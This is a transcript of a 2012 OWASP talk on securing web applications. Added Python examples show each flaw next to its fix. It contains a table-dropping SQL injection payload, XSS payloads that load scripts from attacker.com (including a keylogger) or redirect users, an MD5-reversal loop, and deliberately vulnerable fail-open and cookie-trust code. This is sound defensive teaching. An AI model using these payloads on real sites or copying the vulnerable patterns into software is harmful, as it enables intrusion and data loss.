how to secure web applications
DESCRIPTION
I presented this at the OWASP Hyderabad October 2012 meet. You can find more details at https://www.owasp.org/index.php/Hyderabad
TRANSCRIPT
![Page 1: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/1.jpg)
“The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards.”
- Gene Spafford
![Page 2: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/2.jpg)
SECURING WEB APPLICATIONS
A BIRD'S EYE VIEW
![Page 3: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/3.jpg)
Hello Everyone
![Page 4: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/4.jpg)
Imran Mohammed
# Security Researcher # Null Hyd Moderator # OWASP Hyd Board Member @imran_naseem
![Page 5: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/5.jpg)
Do you know ?
![Page 6: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/6.jpg)
90% of companies got hacked last year
http://www.computerworld.com/s/article/9217853/90_of_companies_say_they_ve_been_hacked_Survey
![Page 7: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/7.jpg)
To name few ...
![Page 8: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/8.jpg)
60% got hacked twice
![Page 9: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/9.jpg)
50% are unsure about this year
![Page 10: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/10.jpg)
Myths of App Sec
![Page 11: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/11.jpg)
Myth #1
We have a network firewall and a WAF
![Page 12: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/12.jpg)
Myth #2
We have SSL, hence we are secure
![Page 13: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/13.jpg)
Myth #3
The testing team will handle security
![Page 14: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/14.jpg)
Myth #4
Nobody will attack us; we are a small organization
![Page 15: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/15.jpg)
![Page 16: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/16.jpg)
“If you think technology can solve your security problems, then you don't understand the problems and you don't understand the technology.”
- Bruce Schneier
![Page 17: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/17.jpg)
![Page 18: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/18.jpg)
Ten commandments of secure development
![Page 19: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/19.jpg)
Input is evil, validate it
Validate the source, context, syntax and semantics of every piece of input, checked against both the current and the previous application state
![Page 20: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/20.jpg)
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James
Back-end: SELECT title,year FROM books WHERE author = 'James'
![Page 21: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/21.jpg)
SQL Injection
Front-end: https://bookstore.com/index.php?authorname=James'; drop table books;--
Back-end: SELECT title,year FROM books WHERE author = 'James'; drop table books;-- '
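The two slides above show the query built by string concatenation and the payload that turns one SELECT into a SELECT plus a DROP. The following Python example is added here and is not code from the deck: it builds the slide's `books` table in an in-memory SQLite database with three constructed rows, runs the slide's payload against the concatenated query and against a parameterised one, and also shows a tautology payload (`' OR '1'='1`) that leaks every row without needing stacked statements. Because `sqlite3.execute()` refuses more than one statement per call, the stacked case is run through `executescript()` to stand in for a driver that allows it.

```python
import sqlite3

# Constructed sample rows standing in for the slide's "books" table.
BOOKS = [
    ("Dune", 1965, "Frank"),
    ("Emma", 1815, "Jane"),
    ("Bleak House", 1853, "Charles"),
]


def fresh_db() -> sqlite3.Connection:
    """In-memory database populated with the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE books (title TEXT, year INTEGER, author TEXT)")
    con.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    return con


def search_vulnerable(con: sqlite3.Connection, authorname: str) -> list:
    """The slide's back end: the user's value is pasted into the SQL text."""
    sql = "SELECT title, year FROM books WHERE author = '" + authorname + "'"
    return con.execute(sql).fetchall()


def search_vulnerable_stacked(con: sqlite3.Connection, authorname: str) -> None:
    """Same concatenation, but run via executescript() so stacked statements
    execute, as they would on a driver that accepts several statements per
    call (sqlite3.execute() alone refuses them)."""
    sql = "SELECT title, year FROM books WHERE author = '" + authorname + "'"
    con.executescript(sql)


def search_safe(con: sqlite3.Connection, authorname: str) -> list:
    """Parameterised query: the value is bound to ?, never parsed as SQL."""
    return con.execute(
        "SELECT title, year FROM books WHERE author = ?", (authorname,)
    ).fetchall()


def table_exists(con: sqlite3.Connection, name: str = "books") -> bool:
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def demo() -> dict:
    tautology = "James' OR '1'='1"           # leaks every row
    stacked = "James'; drop table books;-- "  # the slide's payload

    con = fresh_db()
    leaked = search_vulnerable(con, tautology)   # all three rows
    safe = search_safe(con, tautology)           # no author has that name

    search_vulnerable_stacked(con, stacked)      # DROP TABLE runs
    dropped = not table_exists(con)

    con2 = fresh_db()
    search_safe(con2, stacked)                   # bound as a plain string
    survived = table_exists(con2)

    return {
        "leaked_rows": len(leaked),
        "safe_rows": len(safe),
        "table_dropped": dropped,
        "table_survived": survived,
    }


if __name__ == "__main__":
    print(demo())
```

Input validation on `authorname` is still worth having, but the fix that removes the bug class is the bound parameter: the driver sends the value separately from the statement text, so no quoting trick can change the statement's structure.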
![Page 22: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/22.jpg)
Cross Site Scripting
Functionality:
https://example.com/error.php?message=Sorry%2c+an+error+occurred
“Reflected” back to the client via webserver:
<p>Sorry, an error occurred.</p>
Any problem?
https://example.com/error.php?message=[can i change this ?]
![Page 23: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/23.jpg)
Cross Site Scripting
Attack users:
https://example.com/error.php?message=<script src="attacker.com/malicious.js"></script>
"Reflected" back to the client via the web server: <p><script src="attacker.com/malicious.js"></script>.</p>
More problems
https://example.com/error.php?message=<script src="attacker.com/keylogger.js"></script>
https://example.com/error.php?message=<script>document.location.href="badsite.com"</script>
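The fix for the reflected error page is output encoding for the context the value lands in. The Python example below is added here and is not code from the deck: it reproduces `error.php` reflecting the `message` parameter verbatim, shows the same page with `html.escape`, and adds a constructed second injection point (a search box that reflects `q` inside an attribute) to show why `quote=True` matters in that context. The `PAYLOAD_ATTR` string and the search box are assumptions for illustration.

```python
import html

PAYLOAD_BODY = '<script src="attacker.com/malicious.js"></script>'  # from the slide
PAYLOAD_ATTR = '" autofocus onfocus="alert(1)'                       # constructed


def render_error_vulnerable(message: str) -> str:
    """error.php as on the slide: the parameter is reflected verbatim."""
    return f"<p>{message}</p>"


def render_error_safe(message: str) -> str:
    """HTML body context: encode <, >, & and quotes before reflecting."""
    return f"<p>{html.escape(message, quote=True)}</p>"


def render_search_box_vulnerable(q: str) -> str:
    """Attribute context (constructed): the value can close the attribute
    and add an event handler."""
    return f'<input type="text" name="q" value="{q}">'


def render_search_box_safe(q: str) -> str:
    """quote=True also encodes " and ', so the value cannot break out of
    the attribute it was placed in."""
    return f'<input type="text" name="q" value="{html.escape(q, quote=True)}">'


def contains_markup(fragment: str) -> bool:
    """Did a tag or an event-handler attribute survive into the output?"""
    lowered = fragment.lower()
    return "<script" in lowered or ' onfocus="' in lowered


if __name__ == "__main__":
    print(render_error_vulnerable(PAYLOAD_BODY))
    print(render_error_safe(PAYLOAD_BODY))
    print(render_search_box_vulnerable(PAYLOAD_ATTR))
    print(render_search_box_safe(PAYLOAD_ATTR))
```

Encoding is per context: the body and attribute cases above are covered by `html.escape`, but a value written into a URL, a JavaScript string or a CSS block needs that context's encoder instead. A `Content-Security-Policy` header that blocks scripts from attacker-controlled origins is a useful second layer, not a replacement for encoding.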
![Page 24: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/24.jpg)
```http
POST /books/user1/search.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,
Accept-Language: en-gb,en-us;
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Cookie: PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d
Host: www.example.com

q=sqli&hidden_field=20
```
Check this: the headers, the cookie, the form field and the hidden field are all client-controlled input.
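The request above makes the point that everything the client sends, headers and hidden fields included, is input. The Python example below is added here and is not code from the deck; it validates that request along the four axes from the "Input is evil" slide: source (the session id must be well-formed and known to the server), syntax (an allowlist for `q`), semantics and state (`hidden_field` must be in range and equal to what the server issued for this session), and headers that reach logs. The session table, the allowlists and the meaning of `hidden_field` as a page size are constructed assumptions.

```python
import re
from http.cookies import SimpleCookie

# Allowlists: what a session id, a search term and the hidden field may look like.
SESSION_ID_RE = re.compile(r"^[0-9a-f]{32}$")        # 32 hex digits, as in the request
SEARCH_TERM_RE = re.compile(r"^[A-Za-z0-9 .\-]{1,64}$")
MAX_HEADER_LEN = 256

# Constructed server-side state: what this session was actually issued.
SESSION_STORE = {
    "24c9e15e52afc47c225b757e7bee1f9d": {"user": "user1", "page_size": 20},
}


def parse_cookies(header: str) -> dict:
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def validate_search_request(headers: dict, form: dict, store: dict = SESSION_STORE) -> list:
    """Return the names of the fields that failed validation (empty list = accept)."""
    errors = []

    # Source: the session id must be well-formed AND known to the server.
    sid = parse_cookies(headers.get("Cookie", "")).get("PHPSESSIONID", "")
    session = store.get(sid) if SESSION_ID_RE.match(sid) else None
    if session is None:
        errors.append("PHPSESSIONID")

    # Syntax: the search term is restricted to an allowlist with a length cap.
    if not SEARCH_TERM_RE.match(form.get("q", "")):
        errors.append("q")

    # Semantics and state: a "hidden" field is just another client value. It
    # must be an integer in range and must match what the server issued.
    hidden = form.get("hidden_field", "")
    if not hidden.isdigit() or not (1 <= int(hidden) <= 100):
        errors.append("hidden_field")
    elif session is not None and int(hidden) != session["page_size"]:
        errors.append("hidden_field")

    # Headers that end up in logs or pages are input too: cap the length and
    # reject control characters (CR/LF would let an attacker forge log lines).
    user_agent = headers.get("User-Agent", "")
    if len(user_agent) > MAX_HEADER_LEN or not user_agent.isprintable():
        errors.append("User-Agent")

    return errors


# The request from the slide, as a constructed dict.
SLIDE_REQUEST_HEADERS = {
    "Cookie": "PHPSESSIONID=24c9e15e52afc47c225b757e7bee1f9d",
    "User-Agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
    "Host": "www.example.com",
}
SLIDE_REQUEST_FORM = {"q": "sqli", "hidden_field": "20"}

if __name__ == "__main__":
    print(validate_search_request(SLIDE_REQUEST_HEADERS, SLIDE_REQUEST_FORM))
    print(validate_search_request(SLIDE_REQUEST_HEADERS, {"q": "sqli", "hidden_field": "99"}))
```

Validation rejects what the application does not expect; it is not the control that stops injection (that is parameterised queries and output encoding). The state check on `hidden_field` is the part most often missing: the server already knows the value it issued, so it should compare rather than trust.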
![Page 25: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/25.jpg)
Use cryptographically strong algorithms
![Page 26: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/26.jpg)
Cookie: lang=english; sessionid=aW1yYW4=
Cookie: lang=english; sessionid=cmFnaHU=
Base64 is not encryption (those session ids decode to user names)
![Page 27: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/27.jpg)
http://www.example.com/salary/view/8635f8ebae3017a5581dbeba572eb01a
MD5 is not good enough
Google it: an unsalted MD5 of a predictable value reverses with a web search or a lookup table
![Page 28: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/28.jpg)
Use SHA-2 or better, with a per-record salt; for stored passwords also use a deliberately slow construction (PBKDF2, bcrypt, scrypt or Argon2) rather than a single fast hash
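The three slides above (Base64 session ids, a guessable MD5 in a URL, and the salted-hash advice) fit in one worked example. The Python below is added here and is not code from the deck: it decodes the slide's two cookie values, generates a proper random session id, reverses an unsalted MD5 of a small ID space offline (the local equivalent of "Google it"; the ID space is constructed), and stores and verifies a password with salted, iterated PBKDF2-HMAC-SHA256. The iteration count is an assumed value to keep the example fast; tune it upward for production.

```python
import base64
import hashlib
import hmac
import secrets

SLIDE_COOKIES = ["aW1yYW4=", "cmFnaHU="]   # the sessionid values from the slide


def decode_session_cookie(value: str) -> str:
    """Base64 is an encoding, not encryption: anyone can reverse it."""
    return base64.b64decode(value).decode("utf-8")


def new_session_id() -> str:
    """256 bits from the OS CSPRNG; unguessable and carries no user data."""
    return secrets.token_urlsafe(32)


def md5_hex(value: str) -> str:
    return hashlib.md5(value.encode()).hexdigest()


def reverse_unsalted_md5(target_hex: str, max_id: int):
    """Offline equivalent of "Google it": an unsalted hash over a small,
    predictable space (constructed here as IDs 1..max_id) is reversed by
    simply hashing every candidate."""
    for candidate in range(1, max_id + 1):
        if md5_hex(str(candidate)) == target_hex:
            return str(candidate)
    return None


# Password storage: SHA-2 with a per-record random salt, iterated so guessing
# is slow. Assumed iteration count; raise it for production hardware.
PBKDF2_ITERATIONS = 100_000


def hash_password(password: str) -> str:
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    # Constant-time comparison so timing does not leak how many bytes matched.
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    for cookie in SLIDE_COOKIES:
        print(cookie, "->", decode_session_cookie(cookie))
    print("fresh session id:", new_session_id())
    print("reversed:", reverse_unsalted_md5(md5_hex("8635"), 10_000))
    record = hash_password("correct horse")
    print(record, verify_password("correct horse", record))
```

The salt does two jobs: it makes precomputed lookup tables useless, and it makes two users with the same password store different values. The iteration count is what makes a leaked table expensive to attack; a plain salted SHA-256 still hashes at hundreds of millions of guesses per second on commodity GPUs.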
![Page 29: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/29.jpg)
Minimize attack surface
![Page 30: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/30.jpg)
Use Least privilege
![Page 31: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/31.jpg)
Keep security simple
Keep design as simple and small as possible. Complex design is difficult to understand and secure.
![Page 32: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/32.jpg)
Provide Defense in depth
![Page 33: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/33.jpg)
![Page 34: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/34.jpg)
![Page 35: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/35.jpg)
![Page 36: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/36.jpg)
Fail safely

```java
isAdmin = true;   // fails open: if the block below throws, isAdmin stays true
try {
    codeWhichMayFail();
    isAdmin = isUserInRole("Administrator");
}
catch (Exception ex) {
    log.write(ex.toString());
}
```
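The snippet on the slide is the anti-pattern: the privileged value is the default, so any exception between the assignment and the role check grants admin. The Python below is added here and is not code from the deck; it transcribes the slide's logic with an injectable `prepare()` standing in for `codeWhichMayFail()`, puts the fail-closed version next to it, and constructs a role table and a failing `prepare()` to show the difference.

```python
import logging

log = logging.getLogger("authz")


def is_admin_fail_open(user: str, roles: dict, prepare) -> bool:
    """Transcription of the slide's snippet: the default is True, so any
    exception raised by prepare() leaves the caller believing the user is
    an administrator."""
    is_admin = True
    try:
        prepare()                                        # codeWhichMayFail()
        is_admin = roles.get(user) == "Administrator"    # isUserInRole(...)
    except Exception as ex:
        log.warning("authz check failed: %s", ex)
    return is_admin


def is_admin_fail_closed(user: str, roles: dict, prepare) -> bool:
    """Fail safely: no privilege by default, and an error path that denies
    explicitly instead of carrying on with a guessed value."""
    is_admin = False
    try:
        prepare()
        is_admin = roles.get(user) == "Administrator"
    except Exception as ex:
        log.warning("authz check failed for %s, denying: %s", user, ex)
        is_admin = False
    return is_admin


# Constructed inputs.
ROLES = {"alice": "Administrator", "bob": "User"}


def prepare_ok() -> None:
    return None


def prepare_broken() -> None:
    raise ConnectionError("role database unreachable")


if __name__ == "__main__":
    print("fail open,   bob, db down :", is_admin_fail_open("bob", ROLES, prepare_broken))
    print("fail closed, bob, db down :", is_admin_fail_closed("bob", ROLES, prepare_broken))
```

The same rule applies beyond booleans: a lookup that fails should produce a denial or an error the caller has to handle, never a default that happens to be the most privileged outcome.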
![Page 37: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/37.jpg)
Avoid Security through obscurity
![Page 38: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/38.jpg)
Cookie: lang=english; ADMIN=no; sessionid=yj3735mmhdABC
Cookie: lang=english; ADMIN=yes; sessionid=yj3735mmhdABC
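The two cookies above differ only in a flag the client is free to edit; hiding the flag's name would not help, which is why this sits under "avoid security through obscurity". The Python example below is added here and is not code from the deck: it shows a handler that reads the role from the `ADMIN` cookie next to one that uses the cookie only to find the session and reads the role from a server-side table. The session table and its contents are constructed.

```python
from http.cookies import SimpleCookie

# Constructed server-side session table, keyed by the session id on the slide.
SESSIONS = {"yj3735mmhdABC": {"user": "imran", "role": "user"}}


def parse_cookies(header: str) -> dict:
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


def is_admin_from_cookie(cookie_header: str) -> bool:
    """The slide's anti-pattern: trusting a flag the client holds and can edit."""
    return parse_cookies(cookie_header).get("ADMIN") == "yes"


def is_admin_server_side(cookie_header: str, sessions: dict = SESSIONS) -> bool:
    """The cookie only identifies the session; the role lives on the server,
    so editing the cookie cannot change it."""
    sid = parse_cookies(cookie_header).get("sessionid")
    session = sessions.get(sid) if sid else None
    return bool(session) and session.get("role") == "admin"


if __name__ == "__main__":
    tampered = "lang=english; ADMIN=yes; sessionid=yj3735mmhdABC"
    print("from cookie :", is_admin_from_cookie(tampered))
    print("server side :", is_admin_server_side(tampered))
```

If state must travel in the cookie (stateless deployments), it has to be integrity-protected with a server-held key (an HMAC over the value, or an authenticated-encryption token); renaming or obfuscating the flag gives no protection at all.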
![Page 39: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/39.jpg)
Fix Security issues correctly
![Page 40: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/40.jpg)
Use Secure defaults
Remember scott/tiger?
and admin/password (router's admin panel)
![Page 41: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/41.jpg)
Don't reinvent the wheel
![Page 42: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/42.jpg)
How to develop/fix the code securely?
![Page 43: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/43.jpg)
Follow Secure SDLC
![Page 44: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/44.jpg)
OWASP Development Guide
![Page 45: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/45.jpg)
Educate Developers/Users
![Page 46: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/46.jpg)
Use OWASP ESAPI
![Page 47: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/47.jpg)
![Page 48: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/48.jpg)
Typical OWASP ESAPI Example
![Page 49: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/49.jpg)
Thanks !
![Page 50: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/50.jpg)
Questions ?
![Page 51: How to secure web applications](https://reader034.vdocuments.us/reader034/viewer/2022051608/5455d210b1af9fb66e8b4aeb/html5/thumbnails/51.jpg)
Credits
All icons are taken from the Noun Project
OWASP Project related Images are taken from owasp.org